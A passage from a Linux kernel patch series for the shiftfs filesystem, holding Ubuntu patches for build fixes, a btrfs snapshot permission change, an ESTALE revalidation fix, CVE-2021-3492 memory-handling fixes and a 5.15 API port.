+Content-Transfer-Encoding: 8bit
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1879688
+
+Stéphane reported a bug found during NorthSec that makes heavy use of
+shiftfs. When a subvolume or snapshot is created as userns root in the
+container and then chowned to another user a delete as the root user
+will fail. The reason for this is that we drop all capabilities as a
+safety measure before calling btrfs ioctls. The only workable fix I
+could think of is to retain the CAP_DAC_OVERRIDE capability for the
+BTRFS_IOC_SNAP_DESTROY ioctl. All other solutions would be way more
+invasive.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 5c39529d0a17..5d88193b41db 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1356,7 +1356,7 @@ static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
+ 	return ret;
+ }
+ 
+-static int shiftfs_override_ioctl_creds(const struct super_block *sb,
++static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb,
+ 					const struct cred **oldcred,
+ 					struct cred **newcred)
+ {
+@@ -1381,6 +1381,16 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 	cap_clear((*newcred)->cap_inheritable);
+ 	cap_clear((*newcred)->cap_permitted);
+ 
++	if (cmd == BTRFS_IOC_SNAP_DESTROY) {
++		kuid_t kuid_root = make_kuid(sb->s_user_ns, 0);
++		/*
++		 * Allow the root user in the container to remove subvolumes
++		 * from other users.
++		 */
++		if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root))
++			cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE);
++	}
++
+ 	put_cred(override_creds(*newcred));
+ 	return 0;
+ }
+@@ -1513,7 +1523,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	if (ret)
+ 		goto out_restore;
+ 
+-	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
++	ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred);
+ 	if (ret)
+ 		goto out_fdput;
+ 
+-- 
+2.39.2
+
+From e090464bdd744306b3b766b2a675ee26e934f1ef Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Mon, 15 Jun 2020 15:16:11 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs -- Fix build errors from missing
+ fiemap definitions
+Cc: mpagano@gentoo.org
+
+shiftfs FTBFS with 5.8-rc1:
+
+ /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c: In function 'shiftfs_fiemap':
+ /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:13: error: dereferencing pointer to incomplete type 'struct fiemap_extent_info'
+ /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:26: error: 'FIEMAP_FLAG_SYNC' undeclared (first use in this function); did you mean 'FS_XFLAG_SYNC'?
+
+It seems that shiftfs was getting linux/fiemap.h included
+indirectly before. Include it directly.
+
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 5d88193b41db..f9a5c94a9793 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -20,6 +20,7 @@
+ #include <linux/posix_acl.h>
+ #include <linux/posix_acl_xattr.h>
+ #include <linux/uio.h>
++#include <linux/fiemap.h>
+ 
+ struct shiftfs_super_info {
+ 	struct vfsmount *mnt;
+-- 
+2.39.2
+
+From 436cc946e1acb3833c41e6a7df3239f5f559369a Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Tue, 23 Jun 2020 19:46:16 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent ESTALE for LOOKUP_JUMP
+ lookups
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1872757
+
+Users reported that creating temporary files shiftfs reports ESTALE.
+This can be reproduced via:
+
+import tempfile
+import os
+
+def test():
+    with tempfile.TemporaryFile() as fd:
+        fd.write("data".encode('utf-8'))
+        # re-open the file to get a read-only file descriptor
+        return open(f"/proc/self/fd/{fd.fileno()}", "r")
+
+def main():
+   fd = test()
+   fd.close()
+
+if __name__ == "__main__":
+    main()
+
+a similar issue was reported here:
+https://github.com/systemd/systemd/issues/14861
+
+Our revalidate methods were very opinionated about whether or not a
+lower dentry was valid especially when it became unlinked we simply
+invalidated the lower dentry which caused above bug to surface. This has
+led to bugs where a ESTALE was returned for e.g.  temporary files that
+were created and directly re-opened afterwards through
+/proc/<pid>/fd/<nr-of-deleted-file>. When a file is re-opened through
+/proc/<pid>/fd/<nr> LOOKUP_JUMP is set and the vfs will revalidate via
+d_weak_revalidate(). Since the file has been unhashed or even already
+gone negative we'd fail the open when we should've succeeded.
+
+Reported-by: Christian Kellner <ckellner@redhat.com>
+Reported-by: Evgeny Vereshchagin <evvers@ya.ru>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Link: https://github.com/systemd/systemd/issues/14861
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index f9a5c94a9793..3cfd1881e9a2 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -252,8 +252,6 @@ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
+ 		struct inode *loweri = d_inode(lowerd);
+ 
+ 		shiftfs_copyattr(loweri, inode);
+-		if (!inode->i_nlink)
+-			err = 0;
+ 	}
+ 
+ 	return err;
+@@ -279,8 +277,6 @@ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
+ 		struct inode *loweri = d_inode(lowerd);
+ 
+ 		shiftfs_copyattr(loweri, inode);
+-		if (!inode->i_nlink)
+-			err = 0;
+ 	}
+ 
+ 	return err;
+-- 
+2.39.2
+
+From 21c3ebac069050649a03a1e9d5f2fd4c895fc6cd Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 30 Dec 2020 11:10:20 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix build error with 5.11
+Cc: mpagano@gentoo.org
+
+After commit:
+
+ 8760c909f54a82aaa6e76da19afe798a0c77c3c3 ("file: Rename __close_fd to close_fd and remove the files parameter")
+
+__close_fd() has been renamed to close_fd() and the files parameter has
+been removed.
+
+Change the shiftfs code to properly support this change.
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 3cfd1881e9a2..4f1d94903557 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1420,7 +1420,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 	else
+ 		ret = copy_to_user(arg, v2, sizeof(*v2));
+ 
+-	__close_fd(current->files, fd);
++	close_fd(fd);
+ 	kfree(v1);
+ 	kfree(v2);
+ 
+@@ -1468,7 +1468,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	/*
+ 	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
+ 	 * take a reference here to offset the one which will be put by
+-	 * __close_fd(), and make sure that reference is put on fdput(lfd).
++	 * close_fd(), and make sure that reference is put on fdput(lfd).
+ 	 */
+ 	get_file(lfd.file);
+ 	lfd.flags |= FDPUT_FPUT;
+-- 
+2.39.2
+
+From c0ebd52879a8805e07e59a25e72bce73e2ddcd90 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 9 Apr 2021 13:01:06 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: free allocated memory in
+ shiftfs_btrfs_ioctl_fd_replace() error paths
+Cc: mpagano@gentoo.org
+
+Many error paths in shiftfs_btrfs_ioctl_fd_replace() do not free memory
+allocated near the top of the function. Fix up these error paths to free
+the memory.
+
+Additionally, the addresses for the allocated memory are assigned to
+return parameters early in the function, before we know whether or not
+the function as a whole will return success. Wait to assign these values
+until we know the function was successful, and for good measure
+initialize the return parameters to NULL at the start.
+
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+CVE-2021-3492
+Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 28 +++++++++++++++++++++-------
+ 1 file changed, 21 insertions(+), 7 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 4f1d94903557..8eab93691d62 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1438,6 +1438,9 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	struct btrfs_ioctl_vol_args *v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
+ 
++	*b1 = NULL;
++	*b2 = NULL;
++
+ 	if (!is_btrfs_snap_ioctl(cmd))
+ 		return 0;
+ 
+@@ -1446,23 +1449,23 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 		if (IS_ERR(v1))
+ 			return PTR_ERR(v1);
+ 		oldfd = v1->fd;
+-		*b1 = v1;
+ 	} else {
+ 		v2 = memdup_user(arg, sizeof(*v2));
+ 		if (IS_ERR(v2))
+ 			return PTR_ERR(v2);
+ 		oldfd = v2->fd;
+-		*b2 = v2;
+ 	}
+ 
+ 	src = fdget(oldfd);
+-	if (!src.file)
+-		return -EINVAL;
++	if (!src.file) {
++		ret = -EINVAL;
++		goto err_free;
++	}
+ 
+ 	ret = shiftfs_real_fdget(src.file, &lfd);
+ 	if (ret) {
+ 		fdput(src);
+-		return ret;
++		goto err_free;
+ 	}
+ 
+ 	/*
+@@ -1477,7 +1480,8 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	*newfd = get_unused_fd_flags(lfd.file->f_flags);
+ 	if (*newfd < 0) {
+ 		fdput(lfd);
+-		return *newfd;
++		ret = *newfd;
++		goto err_free;
+ 	}
+ 
+ 	fd_install(*newfd, lfd.file);
+@@ -1492,8 +1496,18 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 		v2->fd = oldfd;
+ 	}
+ 
+-	if (ret)
++	if (!ret) {
++		*b1 = v1;
++		*b2 = v2;
++	} else {
+ 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
++	}
++
++	return ret;
++
++err_free:
++	kfree(v1);
++	kfree(v2);
+ 
+ 	return ret;
+ }
+-- 
+2.39.2
+
+From f0a7637da44fdf17351c0ba4c3f616941c749f57 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 9 Apr 2021 13:10:37 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: handle copy_to_user() return values
+ correctly
+Cc: mpagano@gentoo.org
+
+shiftfs expects copy_to_user() to return a negative error code on
+failure, when it actually returns the amount of uncopied data. Fix all
+code using copy_to_user() to handle the return values correctly.
+
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+CVE-2021-3492
+Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 8eab93691d62..abeb7db3b9be 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1424,7 +1424,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 	kfree(v1);
+ 	kfree(v2);
+ 
+-	return ret;
++	return ret ? -EFAULT: 0;
+ }
+ 
+ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+@@ -1501,6 +1501,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 		*b2 = v2;
+ 	} else {
+ 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
++		ret = -EFAULT;
+ 	}
+ 
+ 	return ret;
+-- 
+2.39.2
+
+From d2e7abdd84fb28842c61ffd7128977f29518e4ef Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Mon, 9 Aug 2021 17:15:28 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix sendfile() invocations
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1939301
+
+Upstream commit 36e2c7421f02 ("fs: don't allow splice read/write without explicit ops")
+caused a regression for us. It states:
+
+> default_file_splice_write is the last piece of generic code that uses
+> set_fs to make the uaccess routines operate on kernel pointers.  It
+> implements a "fallback loop" for splicing from files that do not actually
+> provide a proper splice_read method.  The usual file systems and other
+> high bandwidth instances all provide a ->splice_read, so this just removes
+> support for various device drivers and procfs/debugfs files.  If splice
+> support for any of those turns out to be important it can be added back
+> by switching them to the iter ops and using generic_file_splice_read.
+
+this means that currently all workloads making use of sendfile() on
+shiftfs fail. This includes LXD, Anbox and a range of others. Fix this
+by providing explicit .splice_read() and .splice_write() methods which
+jus restores the status quo and we keep using a generic method provided
+by the vfs.
+
+Cc: Seth Forshee <sforshee@kernel.org>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Paolo Pisati <paolo.pisati@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index abeb7db3b9be..f5f6d8d8144e 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1737,6 +1737,8 @@ const struct file_operations shiftfs_file_operations = {
+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.copy_file_range	= shiftfs_copy_file_range,
+ 	.remap_file_range	= shiftfs_remap_file_range,
++	.splice_read		= generic_file_splice_read,
++	.splice_write		= iter_file_splice_write,
+ };
+ 
+ const struct file_operations shiftfs_dir_operations = {
+-- 
+2.39.2
+
+From ff28712d9e52b3b0b2127e9898b96f7c1e11bd26 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Thu, 20 Jan 2022 16:55:24 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 5.15
+Cc: mpagano@gentoo.org
+
+WARNING: after this change we may see some regressions if shiftfs is
+used with filesystem namespaces.
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 107 ++++++++++++++++++++++++++++++---------------------
+ 1 file changed, 64 insertions(+), 43 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index f5f6d8d8144e..76c54bc12018 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -308,7 +308,8 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
+ 	return p;
+ }
+ 
+-static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
++static int shiftfs_setxattr(struct user_namespace *ns,
++			    struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+ {
+@@ -317,7 +318,7 @@ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_setxattr(lowerd, name, value, size, flags);
++	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
+ 	revert_creds(oldcred);
+ 
+ 	shiftfs_copyattr(lowerd->d_inode, inode);
+@@ -334,7 +335,7 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_getxattr(lowerd, name, value, size);
++	err = vfs_getxattr(&init_user_ns, lowerd, name, value, size);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -354,14 +355,15 @@ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
+ 	return err;
+ }
+ 
+-static int shiftfs_removexattr(struct dentry *dentry, const char *name)
++static int shiftfs_removexattr(struct user_namespace *ns,
++			       struct dentry *dentry, const char *name)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_removexattr(lowerd, name);
++	err = vfs_removexattr(ns, lowerd, name);
+ 	revert_creds(oldcred);
+ 
+ 	/* update c/mtime */
+@@ -371,13 +373,14 @@ static int shiftfs_removexattr(struct dentry *dentry, const char *name)
+ }
+ 
+ static int shiftfs_xattr_set(const struct xattr_handler *handler,
++			     struct user_namespace *ns,
+ 			     struct dentry *dentry, struct inode *inode,
+ 			     const char *name, const void *value, size_t size,
+ 			     int flags)
+ {
+ 	if (!value)
+-		return shiftfs_removexattr(dentry, name);
+-	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
++		return shiftfs_removexattr(ns, dentry, name);
++	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
+ }
+ 
+ static int shiftfs_inode_test(struct inode *inode, void *data)
+@@ -391,7 +394,8 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
+ 	return 0;
+ }
+ 
+-static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
++static int shiftfs_create_object(struct user_namespace *ns,
++				 struct inode *diri, struct dentry *dentry,
+ 				 umode_t mode, const char *symlink,
+ 				 struct dentry *hardlink, bool excl)
+ {
+@@ -453,7 +457,7 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 		inode->i_state |= I_CREATING;
+ 		spin_unlock(&inode->i_lock);
+ 
+-		inode_init_owner(inode, diri, mode);
++		inode_init_owner(ns, inode, diri, mode);
+ 		modei = inode->i_mode;
+ 	}
+ 
+@@ -464,22 +468,22 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 
+ 	if (hardlink) {
+ 		lowerd_link = hardlink->d_fsdata;
+-		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
++		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
+ 	} else {
+ 		switch (modei & S_IFMT) {
+ 		case S_IFDIR:
+-			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
++			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
+ 			break;
+ 		case S_IFREG:
+-			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
++			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
+ 			break;
+ 		case S_IFLNK:
+-			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
++			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
+ 			break;
+ 		case S_IFSOCK:
+ 			/* fall through */
+ 		case S_IFIFO:
+-			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
++			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
+ 			break;
+ 		default:
+ 			err = -EINVAL;
+@@ -535,41 +539,43 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 	return err;
+ }
+ 
+-static int shiftfs_create(struct inode *dir, struct dentry *dentry,
++static int shiftfs_create(struct user_namespace *ns,
++			  struct inode *dir, struct dentry *dentry,
+ 			  umode_t mode,  bool excl)
+ {
+ 	mode |= S_IFREG;
+ 
+-	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
++	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
+ }
+ 
+-static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
++static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+ 			 umode_t mode)
+ {
+ 	mode |= S_IFDIR;
+ 
+-	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
+ 			struct dentry *dentry)
+ {
+-	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
++	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
+ }
+ 
+-static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
++static int shiftfs_mknod(struct user_namespace *ns,
++			 struct inode *dir, struct dentry *dentry, umode_t mode,
+ 			 dev_t rdev)
+ {
+ 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
+ 		return -EPERM;
+ 
+-	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+-static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
++static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+ 			   const char *symlink)
+ {
+-	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
+ }
+ 
+ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+@@ -584,9 +590,9 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+-		err = vfs_rmdir(loweri, lowerd);
++		err = vfs_rmdir(&init_user_ns, loweri, lowerd);
+ 	else
+-		err = vfs_unlink(loweri, lowerd, NULL);
++		err = vfs_unlink(&init_user_ns, loweri, lowerd, NULL);
+ 	revert_creds(oldcred);
+ 
+ 	if (!err) {
+@@ -615,7 +621,8 @@ static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
+ 	return shiftfs_rm(dir, dentry, true);
+ }
+ 
+-static int shiftfs_rename(struct inode *olddir, struct dentry *old,
++static int shiftfs_rename(struct user_namespace *ns,
++			  struct inode *olddir, struct dentry *old,
+ 			  struct inode *newdir, struct dentry *new,
+ 			  unsigned int flags)
+ {
+@@ -625,6 +632,14 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ 		      *trapd;
+ 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
+ 		     *loweri_dir_new = lowerd_dir_new->d_inode;
++	struct renamedata rd = {
++		.old_mnt_userns	= ns,
++		.old_dir	= loweri_dir_old,
++		.old_dentry	= lowerd_old,
++		.new_mnt_userns	= ns,
++		.new_dir	= loweri_dir_new,
++		.new_dentry	= lowerd_new,
++	};
+ 	int err = -EINVAL;
+ 	const struct cred *oldcred;
+ 
+@@ -634,8 +649,7 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ 		goto out_unlock;
+ 
+ 	oldcred = shiftfs_override_creds(old->d_sb);
+-	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
+-			 NULL, flags);
++	err = vfs_rename(&rd);
+ 	revert_creds(oldcred);
+ 
+ 	shiftfs_copyattr(loweri_dir_old, olddir);
+@@ -691,7 +705,7 @@ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
+ 	return d_splice_alias(inode, dentry);
+ }
+ 
+-static int shiftfs_permission(struct inode *inode, int mask)
++static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, int mask)
+ {
+ 	int err;
+ 	const struct cred *oldcred;
+@@ -702,12 +716,12 @@ static int shiftfs_permission(struct inode *inode, int mask)
+ 		return -ECHILD;
+ 	}
+ 
+-	err = generic_permission(inode, mask);
++	err = generic_permission(ns, inode, mask);
+ 	if (err)
+ 		return err;
+ 
+ 	oldcred = shiftfs_override_creds(inode->i_sb);
+-	err = inode_permission(loweri, mask);
++	err = inode_permission(ns, loweri, mask);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -733,7 +747,8 @@ static int shiftfs_fiemap(struct inode *inode,
+ 	return err;
+ }
+ 
+-static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
++static int shiftfs_tmpfile(struct user_namespace *ns,
++			   struct inode *dir, struct dentry *dentry,
+ 			   umode_t mode)
+ {
+ 	int err;
+@@ -745,13 +760,13 @@ static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
+ 		return -EOPNOTSUPP;
+ 
+ 	oldcred = shiftfs_override_creds(dir->i_sb);
+-	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
++	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+ 
+-static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
++static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, struct iattr *attr)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = lowerd->d_inode;
+@@ -761,7 +776,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+-	err = setattr_prepare(dentry, attr);
++	err = setattr_prepare(ns, dentry, attr);
+ 	if (err)
+ 		return err;
+ 
+@@ -778,7 +793,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(lowerd, &newattr, NULL);
++	err = notify_change(ns, lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+@@ -787,7 +802,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	return err;
+ }
+ 
+-static int shiftfs_getattr(const struct path *path, struct kstat *stat,
++static int shiftfs_getattr(struct user_namespace *ns,
++			   const struct path *path, struct kstat *stat,
+ 			   u32 request_mask, unsigned int query_flags)
+ {
+ 	struct inode *inode = path->dentry->d_inode;
+@@ -870,9 +886,9 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
+ 			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
+ 			break;
+ 		case ACL_GROUP:
+-			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kgid = make_kgid(from, le32_to_cpu(entry->e_id));
+ 			kgid = shift_kgid(from, to, kgid);
+-			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
++			entry->e_id = cpu_to_le32(from_kgid(from, kgid));
+ 			break;
+ 		default:
+ 			break;
+@@ -880,7 +896,8 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
+ 	}
+ }
+ 
+-static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
++static struct posix_acl *
++shiftfs_get_acl(struct inode *inode, int type, bool rcu)
+ {
+ 	struct inode *loweri = inode->i_private;
+ 	const struct cred *oldcred;
+@@ -890,6 +907,9 @@ static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
+ 	int size;
+ 	int err;
+ 
++	if (rcu)
++		return ERR_PTR(-ECHILD);
++
+ 	if (!IS_POSIXACL(loweri))
+ 		return NULL;
+ 
+@@ -941,6 +961,7 @@ shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
+ 
+ static int
+ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
++			    struct user_namespace *ns,
+ 			    struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+@@ -952,17 +973,17 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
+ 		return -EOPNOTSUPP;
+ 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
+ 		return value ? -EACCES : 0;
+-	if (!inode_owner_or_capable(inode))
++	if (!inode_owner_or_capable(ns, inode))
+ 		return -EPERM;
+ 
+ 	if (value) {
+ 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
+ 				    loweri->i_sb->s_user_ns,
+ 				    (void *)value, size);
+-		err = shiftfs_setxattr(dentry, inode, handler->name, value,
++		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
+ 				       size, flags);
+ 	} else {
+-		err = shiftfs_removexattr(dentry, handler->name);
++		err = shiftfs_removexattr(ns, dentry, handler->name);
+ 	}
+ 
+ 	if (!err)
+-- 
+2.39.2
+
+From df4546ab77323af5bd40996244af7ade6c99054b Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 13 Apr 2022 15:26:22 +0200
